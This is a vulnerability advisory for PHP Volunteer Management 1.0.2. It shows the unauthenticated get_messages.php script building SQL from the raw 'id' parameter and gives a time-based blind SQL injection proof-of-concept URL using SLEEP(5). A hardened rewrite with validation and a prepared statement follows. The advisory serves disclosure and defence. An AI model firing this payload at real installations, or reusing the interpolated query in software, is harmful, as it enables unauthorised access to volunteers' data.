# Title: PHP Volunteer Management (get_messages.php) SQL Injection Vulnerabilities
#
# Author: eidelweiss
# Twitter: @AriosRandy
# Website: www.eidelweiss.info
# Software Site: https://sourceforge.net/projects/phpvolunteer/
# Version: 1.0.2
# Category: webapp (php)
# Greetz: Devilzc0de, exploit-db, G13 (first vuln disclosed at http://www.exploit-db.com/exploits/18788/) and YOU !!!

##### ToC #####

0x01 Description
0x02 vuln c0de

##### 0x01 Description #####

PHP Volunteer Management is software for keeping track of volunteer hours worked and location assignments. The system is built on PHP/MySQL.

##### 0x02 vuln c0de #####

---------------Vulnerability-------------------

get_messages.php
==
<?php
define('INCLUDE_CHECK',true);
include '../../../config/connect.php';

// $id comes straight from the query string and is interpolated into the SQL text unescaped
$id = $_GET['id'];

$query = "SELECT * FROM messages, volunteers WHERE message_to_id = '$id' AND message_from_id = volunteer_id ORDER BY message_state, message_id";

$mysql_result = mysql_query($query);

$result = array();
while ($row = mysql_fetch_assoc($mysql_result)) {
    $result[] = $row;
}

$data = json_encode($result);
print_r($data);
?>
==

The 'id' parameter is vulnerable to SQL injection. No authentication is needed, so any unauthenticated request to the script reaches the query.

----------Exploit-----------------------------------

http://localhost/mods/messages/data/get_messages.php?id=[SQLi]&take=10&skip=0&page=1&pageSize=10

------------PoC---------------------------

http://localhost/mods/messages/data/get_messages.php?id=1%27%20AND%20SLEEP%285%29%20AND%20%27BDzu%27=%27BDzu&take=10&skip=0&page=1&pageSize=10

##### E0F #####
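The root cause above is string interpolation of `$_GET['id']` into the SQL text, reachable without a session. The following is an added hardened rewrite of get_messages.php for comparison; it is not code from the project or from the advisory author. It assumes that `config/connect.php` exposes a `mysqli` connection in a variable named `$db` and that the application stores the logged-in volunteer's id in `$_SESSION['volunteer_id']`; both names are assumptions, since the advisory does not show connect.php or the session layout.

```php
<?php
// Hardened version of get_messages.php (added example, not the project's code).
// Assumptions: connect.php provides a mysqli object in $db, and the login code
// stores the authenticated volunteer's id in $_SESSION['volunteer_id'].
define('INCLUDE_CHECK', true);
include '../../../config/connect.php';

session_start();
header('Content-Type: application/json');

// 1. Authentication: the original script answers anonymous requests.
if (empty($_SESSION['volunteer_id'])) {
    http_response_code(403);
    exit(json_encode(['error' => 'not authenticated']));
}

// 2. Input validation: message_to_id is an integer key, so accept nothing else.
//    FILTER_VALIDATE_INT returns false for strings such as "1' AND SLEEP(5)...".
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT);
if ($id === false || $id === null) {
    http_response_code(400);
    exit(json_encode(['error' => 'invalid id']));
}

// 3. Authorisation: a volunteer may only read their own inbox.
if ($id !== (int) $_SESSION['volunteer_id']) {
    http_response_code(403);
    exit(json_encode(['error' => 'forbidden']));
}

// 4. Parameterised query: the value is bound as an integer, never spliced into
//    the SQL string, so the query structure cannot be altered by the client.
$stmt = $db->prepare(
    'SELECT * FROM messages, volunteers
      WHERE message_to_id = ? AND message_from_id = volunteer_id
      ORDER BY message_state, message_id'
);
$stmt->bind_param('i', $id);
$stmt->execute();
$rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
$stmt->close();

echo json_encode($rows);
```

Two design points: the integer validation alone already blocks the PoC payload, but the prepared statement is what makes the query safe regardless of how the value is parsed, so both belong together rather than one instead of the other. `mysqli_stmt::get_result()` needs the mysqlnd driver; on builds without it, `bind_result()` with a fetch loop gives the same rows. The `ext/mysql` functions used by the original (`mysql_query`, `mysql_fetch_assoc`) were removed in PHP 7, so the migration to `mysqli` or PDO is required for current PHP versions in any case.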